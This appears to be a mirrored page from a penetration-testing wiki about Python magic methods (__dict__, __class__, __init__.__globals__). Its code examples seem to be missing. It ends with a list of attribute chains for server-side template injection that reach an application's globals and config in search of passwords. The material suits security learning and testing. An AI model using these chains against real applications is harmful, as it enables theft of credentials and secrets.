mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
1.8 KiB
1.8 KiB
Magic Methods
Class Methods
You can access the methods of a class using __dict__.
You can access the functions
Object class
Attributes
You can access the attributes of an object using __dict__. Example:
Class
You can access the class of an object using __class__
You can access the methods of the class of an object chainning magic functions:
Server Side Template Injection
Interesting functions to exploit this vulnerability
__init__.__globals__
__class__.__init__.__globals__
Inside the response search for the application (probably at the end?)
Then access the environment content of the application where you will hopefully find some passwords of interesting information:
__init__.__globals__[<name>].config
__init__.__globals__[<name>].__dict__
__init__.__globals__[<name>].__dict__.config
__class__.__init__.__globals__[<name>].config
__class__.__init__.__globals__[<name>].__dict__
__class__.__init__.__globals__[<name>].__dict__.config